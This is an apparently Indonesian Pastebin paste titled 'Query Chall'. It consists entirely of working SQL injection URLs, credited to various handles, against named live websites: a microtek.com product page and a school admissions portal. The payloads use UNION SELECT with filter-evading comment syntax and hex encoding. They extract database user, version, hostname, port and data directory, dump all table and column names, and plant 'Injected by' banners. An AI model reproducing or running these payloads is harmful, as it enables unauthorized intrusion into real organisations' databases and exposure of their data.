dedot

Query Chall

Jul 6th, 2018 (edited)
214
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.74 KB | None | 0 0
  1. query good
  2.  
  3. -------------------------------------------------------------------------------------------------------------------
  4. Query w : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) UNION SELECT 1,2,3,4,5,6,7,concat('Injected by Fansa<br>',user(),'<br>',@@version,'<br>',database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
  5.  
  6. Nikolas : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) union select 1,2,3,4,5,6,7,Concat('Injected By Hostketeer','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=CoNCaT(@x,'<br>',table_name,'::',column_name))))x)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
  7.  
  8. Bayu : http://www.microtek.com/products.php?KindID=6&ID=1+limit+2%2C1+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C64%2C65%2C66%2Cconcat(%27</title>%27,0x496e6a6563746564206279204b686174756c697374697761,0x3c62723e,0x56657273696f6e203a3a3a20,version(),0x3c62723e,0x55736572203a3a3a20,user(),0x3c62723e,0x4461746162617365203a3a3a20,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),68,69,70--+
  9.  
  10. Diwan : http://www.microtek.com/products.php?KindID=6&ID=1+And x(point(9,9))+UNION+SELECT 1,2,3,4,5,6,concat(0x496e6a6563746564206279202e2f57616e7a5f4944,'</br>',user(),'</br>',database(),'</br>',version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70--
  11.  
  12. Rio : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,Concat('</title>','Injected By RHawkz404','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(SELECT GROUP_CONCAT(table_name,0x203a3a20,column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE())),68,69,70--
  13.  
  14. Revo : http://www.microtek.com/products.php?KindID=6&ID=1 =75=75 union select 1,2,3,4,5,6,CONCAT('Injected by R3V0',0x3c62723e,USER(),0x3c62723e,DATABASE(),0x3c62723e,VERSION()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70--
  15.  
  16. -----------------------------------------------------------------------------------------------------------------------
  17.  
  18. My QUERY
  19. https://www.sman12merangin.sch.id/ppdb/index.php?page=info&id=-53%27+/*!50000UNION+*/ALL+/*!50000SELECT*/+1,/*!12345Concat*/(%27%3Cbr%3E%27,%27%3Cimg%20src=%22https://vignette.wikia.nocookie.net/disney/images/0/03/Miguel-dante.png%22%20height=%22200%22%20width=%22200%22%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Inject%20By%20Cipuyz%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Version%20::%20%27,version/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Database%20::%20%27,database/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Port%20::%20%27,@@port,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Hostname%20::%20%27,@@hostname,%27%3C/font%3E%27,%27%3Cbr%3E%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),3,4--%20-
  20.  
  21. QUERY STERBEN
  22. https://www.sman12merangin.sch.id/ppdb/index.php?page=info&id=-52%27+/*!union*/+/*!select*/1,0x3c62723e496e6a65746564204279205354455242454e3c62723e3c696d67207372633d2268747470733a2f2f73636f6e74656e742e6663676b342d322e666e612e666263646e2e6e65742f762f74312e302d392f31373633303032385f3334393235303633353437323934315f323431373835333236303036343132313937335f6e2e6a70673f5f6e635f6361743d30265f6e635f657569323d41654777355a3147594d2d63636459586b684336665f7767446338724745307a4f523750537a6644586c66344764484655425a486848536b48624d3236535152794d3070736274787a79316671476b3154723459495458356c736b317a7171355845716239675972454d62316967266f683d3764633236663764633834643434343834353961633030643464376334623633266f653d354239344646393922206865696768743d22323030222077696474683d2232303022,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),concat+(@@hostname,0x3c62723e,@@port,0x3c62723e,@@version,0x3c62723e,0x3c62723e)--+
  23.  
  24. QUERY FANSA NO IMAGE BUT NO PROBLEM
  25. https://www.sman12merangin.sch.id/ppdb/index.php?page=informasi&cari=Sekolah%27%20and%201=1%20and%20false%20/*!50000Union*/%20Select%201,/*!50000Concat*/(%27%3Cbr%3EInjected%20by%20Fansa%3Cbr%3E%27,%27USER%20::%20%27,user/**x**/(),%27%3Cbr%3E%27,%27DATABASE%20::%20%27,database/**x**/(),%27%3Cbr%3E%27,%27HOSTNAME%20::%20%27,@@hostname,%27%3Cbr%3E%27,%27VERSION%20::%20%27,@@version,%27%3Cbr%3E%27,%27PORT%20::%20%27,@@port,%27%3Cbr%3E%27,%27DIR%20::%20%27,@@datadir,%27%3Cbr%3E%27,make_set(6,@:=%27%20%27,(select(1)/*!50000from*/(/*!50000information_schema*/.columns)where@:=make_set(511,@,%27%3Cli%3E%27,/*!50000table_name*/,/*!50000column_name*/)),@)),3,4--%20-
  26.  
  27. QUERY IMADE NO IMAGE BUT NO PROBLEM
  28. https://www.sman12merangin.sch.id/ppdb/index.php?page=info&id=-52%27+/*!50000UNION*/+ALL+/*!50000SELECT*/+1,concat(0x696e6a656374204279204d722e204d207b696d617d,0x7c,@@version,0x7c,@@hostname,0x7c,@@port,0x7c,@@datadir,0x7c),export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),4--+
  29.  
  30. QUERY JAINUDIN
  31. https://www.sman12merangin.sch.id/ppdb/index.php?page=informasi&cari=1'%20and%20false%20/*!50000union*/%20/*!50000select*/%201,concat(@c:=0x00,0x3c696d67207372633d2268747470733a2f2f692e65626179696d672e636f6d2f696d616765732f672f7e4c5141414f53775a4b425a4b4145712f732d6c3430302e6a7067223e3c2f696d673e,0x3c62723e,0x696e6a6563742062792057314255,0x3c62723e,/*!50000database*/(),0x3c62723e,@@version,0x3c62723e,/*!50000user*/(),0x3c62723e,@@port,0x3c62723e,@@hostname,if((select%20count(*)%20from%20/*!50000information_schema*/.columns%20/*!50000where*/%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c),3,4--+-
  32.  
  33. QUERY RAFLI PASYA
  34. https://www.sman12merangin.sch.id/ppdb/index.php?page=info&id=.51%27/*!50000UnIoN*/%20/*!50000SeLeCt*/1111,Concat(%22JIHYO%20IS%20HERE%22,%22%3Cbr%3E%22,%22%3Cbr%3E%22,Version/**_**/(),%22%3Cbr%3E%22,Database/**_**/(),%22%3Cbr%3E%22,User/**_**/(),%22%3Cbr%3E%22,@@hostname,%22%3Cbr%3E%22,@@port,@C:=%22%3Cbr%3E%22,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,%22%3Cbr%3E%22,/*!12345table_name*/,/*!12345column_name*/)),@)),3333,4444--+
Add Comment
Please, Sign In to add comment